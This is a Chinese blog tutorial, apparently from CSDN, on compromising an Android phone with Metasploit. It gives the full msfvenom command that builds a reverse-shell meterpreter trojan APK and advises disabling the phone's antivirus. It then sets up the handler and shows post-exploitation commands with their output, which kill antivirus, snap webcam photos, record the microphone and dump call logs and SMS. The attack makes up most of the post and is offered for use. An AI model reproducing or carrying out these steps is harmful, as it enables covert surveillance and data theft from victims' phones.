利用metasploit对手机进行渗透实战

最新推荐文章于 2024-06-27 18:17:03 发布
最新推荐文章于 2024-06-27 18:17:03 发布
阅读量3.2k 收藏 37
点赞数 5
分类专栏: 手机渗透 文章标签: 安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52907838/article/details/119785126
版权

第一步:用ifconfig命令查看本机ip地址

第二步:用msfvenom -p命令生成apk木马文件

具体命令为

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.101.7 lport=8848 R > /home/kali/桌面/muma.apk

说明:lhost后面的IP地址为刚刚查到的本机IP(这里也可以不用本机IP),lport后面为自己规定的端口号,我规定的为8848,R为指定文件格式,后面接生成apk的地址和名字,apk为安卓可执行程序文件。

第三步:将生成的apk安装到要渗透的手机上,最好将手机的杀毒关闭,以免被杀掉。

第四步:Kali上打开metasploit进行渗透

具体操作过程为:    

msfconsole     //开启测试框架

msf6 > use multi/handler     //调用模块
[*] Using configured payload generic/shell_reverse_tcp

msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp     //使用之前设置的攻击安卓手机的payload
payload => android/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost 192.168.101.7    //设置本机IP地址进行监听
lhost => 192.168.101.7

msf6 exploit(multi/handler) > set lport 8848             //设置本机监听端口要与刚刚的一致
lport => 8848

msf6 exploit(multi/handler) > run                    // 执行后点击手机上安装的病毒程序
[*] Started reverse TCP handler on 192.168.101.7:8848
[*] Sending stage (76781 bytes) to 192.168.101.7

第五步:就可以进行操作了(手机要同意权限的获取)

meterpreter > run killav                      //先关闭软杀
[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...



meterpreter > webcam_snap     // 拍摄照片
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/hAwvlKIu.jpeg


meterpreter > ps     //查看安卓机中的进程

Process List
============
PID    Name                                User
---    ----                                ----
1      /init                               root
2      kthreadd                            root
3      ksoftirqd/0                         root
5      kworker/0:0H                        root
7      migration/0                         root
8      rcu_preempt                         root
9      rcu_bh                              root
10     rcu_sched                           root
11     migration/1                         root
12     ksoftirqd/1                         root
14     kworker/1:0H                        root
。。。。。。


meterpreter > record_mic     //拍摄视频
[*] Starting...
[*] Stopped
Audio saved to: /root/psbfvTsR.wav

meterpreter > dump_calllog      //获取通讯录
[*] Fetching 33 entries
[*] Call log saved to calllog_dump_20210212134522.txt

meterpreter > dump_sms     // 获取短信
[*] No sms messages were found!       //没有短信

Kevin_xiao~
关注
  • 5
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Metasploit渗透测试指南.修订版
09-12
Metasploit渗透测试指南》是一本专注于网络安全领域的重要书籍,尤其对于那些希望深入了解和运用Metasploit框架进行渗透测试的专业人士来说,它提供了一条深入理解与实践的路径。Metasploit是一款强大的开源安全...
使用msf工具对安卓手机进行渗透攻击———超详细
热门推荐
weixin_71669458的博客
07-28 1万+
1.需要安装好kali的虚拟机2.在Windows电脑上需要配置Java环境变量。
Kali Linux使用Metasploit生成木马入侵安卓系统
简介
02-24 8186
前言,前言这是我最难想出来的对,这是我最后一篇文章,周一我们开学了,漏洞实战怕实现不了,至少放假可以更文章,我们只放一天,提示:以下是本篇文章正文内容,下面案例可供参考时间不够了,所以不做演示了,所以再见。
手机渗透神器/渗透工具cs-详细白帽子自学路线
最新发布
程序员六七的博客
06-27 353
基础知识Metasploitable:一个刻意制作出来包含漏洞的基于Ubuntu的Linux虚拟机操作系统。DVWA:一个针对Web应用的Web
客户端渗透之——使用Metasploit渗透Android系统
冰河的专栏
01-24 4756
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86633320 可以创建一个新的APK文件,也可以将攻击载荷注入到一个现有的APK文件来攻击Android平台,这里我们使用第一种方法。 1.创建APK文件 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168....
kali渗透安卓手机实战案例
weixin_51525416的博客
08-03 5358
/ -p:指定有效载荷:可以安装在安卓环境下并执行 LHOST:指定kali自身ip LPORT:端口设置 R;​ kali设置好侦听,在主机以及端口8848上进行侦听,一旦目标安卓手机发送会话,这段程序会将载荷发送过去用于控制对方手机。这时候我们打开kail自带的文件系统,找到hack.apk文件并发送到安卓靶机上。此时,已经在kali环境中创建了一个.apk的木马程序。//打开metasploit渗透框架。run执行渗透攻击,等待主机上线。
利用手机作为渗透工具的一些思路
goddemon
03-02 8438
前言这里的配置指的是 kali linux的安装 wifi攻击破解的思路常用两种 第一种 wifite自动化WEP/WPA破解工具 提示没有网卡就很难受 第二种 aircrack-ng破解 监听网卡的账户密码 dsniff -i wlan0
MetaSploit渗透攻击平台
04-20
### MetaSploit渗透攻击平台 #### 一、MetaSploit框架简介 MetaSploit Framework(MSF)是一款开源的安全评估工具,自2003年起便以开放源代码的形式发布,为广大安全研究者和渗透测试工程师提供了一个强大的平台。...
Web服务器渗透实战.rar
06-20
在网络安全领域,Web服务器渗透测试是一项至关重要的技能,它涉及到对Web应用程序的安全进行深入的检查,以发现潜在的漏洞并防止黑客攻击。"Web服务器渗透实战"这个资源包可能是为了帮助学习者理解和掌握这一技术...
0x03.第三课 MetaSploit实战对Apache HTTP服务器守护进程中断复现.pdf
06-24
### MetaSploit实战对Apache HTTP服务器守护进程中断复现 #### 概述 本文将详细介绍如何利用MetaSploit框架对存在特定Apache HTTP服务器守护进程中断漏洞的目标进行复现。此漏洞主要出现在Apache HTTP服务器1.x和2...
msf手机渗透二(实现外网渗透
weixin_63204687的博客
11-07 3149
在内网穿透官网注册飞鸽内网穿透开通隧道,然后本地端口与公网端口绑定,这样访问公网的所有请求最后都会传入本地端口。在本地生成apk的时候使用公网IP和对应Port而对其进行监听的时候设置本地IP和port。这样app在别人手机上被点击以后会直接链接公网对应IP端口,因为公网的已经和本地的绑定了,并且在电脑监听的时候监听的是本地端口,所以最后链接返回给本地电脑。使用公网开通隧道本质上是一个桥梁作用,连接了不同局域网之间的通信。
安卓渗透测试常用工具大合集
Cairo_A的博客
06-10 1820
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。Android传承着Linux的血统,无疑使渗透 从机器端到各种终端,使用起来更加方便,工具集中了众多方法,大大提高了渗透的效率。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去接私活完全没有问题。
Windows网络服务渗透测试实战-MSF恶意程序利用
c_lanxiaofang的博客
05-20 4140
一、实验项目名称 Windows网络服务渗透测试实战-MSF恶意程序利用 二、实验目的及要求 掌握对MSF恶意程序利用的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行渗透操作 对安卓msf上线进行图标隐藏,pc上线自行进行操作截图 一、Android端 1、查看kali的IP 192.168.43.89 2、生成一个apk文件到桌面 命令中的lhost为kali系统的IP,lport为监听端口,此处设置9988 msfvenom -p and.
Metasploit后门攻击android
2301_77778745的博客
04-26 419
之后攻击便完成了,这时候返回一个meterpreter可以执行各种命令,可以通过’?‘来进行辅助获得更多的帮助信息。接着在终端里输入/etc/init.d/apache2 start 启动apache服务。/var/www/html是生成木马的路径,也是kali 2.0的web服务器路径。注意要把LHOST 和LPORT 设置成刚才配置木马程序的IP和端口。确认无误后,便可以开始监听,使用。LHOST对应的是本机的ip地址。LPORT对于你要监听的端口。
移动安全app渗透测试渗透流程、方案及测试要点讲解
软件测试技术分享官
06-11 3410
说好的web渗透测试和服务器端渗透测试呢,虽然懵逼,不过凭借我强大的自学能力,有了下面这篇文章,工欲善其事,必先利其器。先整理好思路,渗透起来才能顺利不迷茫。
Kali利用MSF渗透安卓手机
weixin_51641247的博客
03-29 5455
利用Kali渗透安卓手机; MSF是一个综合性渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具
我的MSF之Android木马渗透的学习笔记
yuan_boss的博客
06-07 4588
使用kali制作Android木马并进行通讯录渗透的学习笔记
【App渗透】用BurpSuite抓包安卓手机app内容
04-08 1126
很多情况下,在电脑的手机模拟器上面做app测试会存在大大小小的bug或者各种坑,而且有些模拟器很不方便,非常不好用。网上的教程虽然多,但是大部分都是两年前的甚至更晚的,跟着一步步来也是会错。为了避免这种情况的发生,所以有了这篇文章。在本机上面做app渗透,才是最稳定的。当然,我检测的app都是公司的产品,如果是你们要测一个不知情的app,还是建议杀杀毒,或者另外某🐟上面买一台二手的安卓机,非常便宜,几百块的手机到处都有,反正就是做个app测试,专门给自己买个测试机或者拿来搞安卓逆向都是很香的。
Metasploit渗透测试实战指南
"Metasploit渗透测试指南中文版" Metasploit是网络安全领域中的一款强大工具,主要用于渗透测试安全漏洞的研究。《Metasploit渗透测试指南》是一本深入讲解该平台的专业书籍,由David Kennedy、Jim O’Gorman、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kevin_xiao~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值